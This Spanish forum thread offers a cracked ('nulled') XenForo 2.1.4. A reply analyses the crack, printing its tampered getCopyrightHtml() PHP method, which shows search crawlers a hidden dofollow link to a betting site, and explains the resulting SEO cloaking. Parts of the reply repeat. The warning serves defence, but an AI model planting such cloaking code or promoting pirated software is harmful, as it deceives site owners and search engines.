Xenforo 2.1.4 nulled
- PHP: 5.4.0+
- MySQL: 5.5+
- PHP extensions: MySQLi, GD (with JPEG support), PCRE, SPL, SimpleXML, DOM, JSON, iconv, ctype, cURL
¡Cualquier problema dejame un comentario!
XENFORO 2.1.4 NULLED
- Autor Sisco
- Fecha de inicio
- Tagged users
-
🏴☠️ Consigue una invitación al foro para poder registrarte 🏴☠️
✅ Informática · Redes sociales y Emprendimiento · Trading/Forex · Criptomonedas · Códigos y ofertas ✅
¡Cualquier problema dejame un comentario!
intel
Programador
Xenforo es uno de los cms para foros mas usados y mas caros creo, cuenta con una comunidad muy grande tanto de usuarios como de desarrolladores de tmeas y plugins.
Tengo muchisimos plugins por si a alguien le interesa
Rodkaiser
Rod de Lezo | Kaiser de Ovieco
DcD
Miembro activo
Cuidado a todos los que estén pensando en montar esto en un servidor de producción.
He estado investigando el código (sí, ya se que el post es del 2019, pero estaba buscando un leak de xenforo xd) y viene con regalito.
Como suele pasar con las versiones nulled, el grupo que lo ha crackeado ha inyectado código malicioso silencioso para hacer Blackhat SEO a costa de la reputación de vuestros servidores.
Si revisáis el método getCopyrightHtml() en XF.php, veréis que han modificado la función original para incluir un ataque de Cloaking basado en User-Agent sniffing.
Aquí tenéis el snippet infectado:
public static function getCopyrightHtml()
{
if(preg_match('/google|msn|yahoo|altavista|crawler|findlinks|AhrefsBot|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|wget/i', $_SERVER['HTTP_USER_AGENT'])){
return '<a href="https://xenforo.com" class="u-concealed" dir="ltr" target="_blank">Forum software by XenForo™ <span class="copyright">© 2010-2019 XenForo Ltd.</span></a><a class="u-concealed" rel="dofollow" href="https://bahisvip1.com/" target="_blank" title="bonus, bahis bonusu... ">Deneme Bonusu</a>';
}else{
return '<a href="https://xenforo.com" class="u-concealed" dir="ltr" target="_blank">Forum software by XenForo™ <span class="copyright">© 2010-2019 XenForo Ltd.</span></a>';
}
}
Todo el jugo SEO (Domain Authority) que ganes con tu foro se lo estarás inyectando a esa red de apuestas de forma transparente. A corto plazo no notarás nada en el frontend, pero a medio plazo, cuando los crawlers de Google detecten la discrepancia entre lo que ve el usuario y lo que ve el bot (que es ilegal), tu dominio se comerá una penalización manual o un baneo directo del índice de búsqueda (De-indexing).
He estado investigando el código (sí, ya se que el post es del 2019, pero estaba buscando un leak de xenforo xd) y viene con regalito.
Como suele pasar con las versiones nulled, el grupo que lo ha crackeado ha inyectado código malicioso silencioso para hacer Blackhat SEO a costa de la reputación de vuestros servidores.
Si revisáis el método getCopyrightHtml() en XF.php, veréis que han modificado la función original para incluir un ataque de Cloaking basado en User-Agent sniffing.
Aquí tenéis el snippet infectado:
public static function getCopyrightHtml()
{
if(preg_match('/google|msn|yahoo|altavista|crawler|findlinks|AhrefsBot|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|wget/i', $_SERVER['HTTP_USER_AGENT'])){
return '<a href="https://xenforo.com" class="u-concealed" dir="ltr" target="_blank">Forum software by XenForo™ <span class="copyright">© 2010-2019 XenForo Ltd.</span></a><a class="u-concealed" rel="dofollow" href="https://bahisvip1.com/" target="_blank" title="bonus, bahis bonusu... ">Deneme Bonusu</a>';
}else{
return '<a href="https://xenforo.com" class="u-concealed" dir="ltr" target="_blank">Forum software by XenForo™ <span class="copyright">© 2010-2019 XenForo Ltd.</span></a>';
}
}
¿Cómo funciona la inyección?
- Identificación (Fingerprinting): El código intercepta la cabecera HTTP_USER_AGENT de todas las peticiones entrantes.
- Filtrado: A través de una expresión regular (preg_match), verifica si quien está visitando el sitio es un usuario real o un crawler de indexación (Googlebot, Bingbot, rastreadores de Ahrefs, Baidu, etc.).
- Ejecución del Payload (Cloaking): * Si eres un humano navegando normalmente, entra por el else y te muestra el copyright limpio. A simple vista, el foro parece 100% legítimo.
- Si detecta que es el bot de Google, altera la respuesta inyectando un enlace oculto (mediante clases CSS como u-concealed) y, lo más importante, con la etiqueta rel="dofollow". Ese enlace apunta a una página turca de apuestas y casinos (bahisvip1.com).
El Impacto real
Básicamente, al instalar esto estás convirtiendo tu máquina en un nodo esclavo para una granja de enlaces (Link Farm).Todo el jugo SEO (Domain Authority) que ganes con tu foro se lo estarás inyectando a esa red de apuestas de forma transparente. A corto plazo no notarás nada en el frontend, pero a medio plazo, cuando los crawlers de Google detecten la discrepancia entre lo que ve el usuario y lo que ve el bot (que es ilegal), tu dominio se comerá una penalización manual o un baneo directo del índice de búsqueda (De-indexing).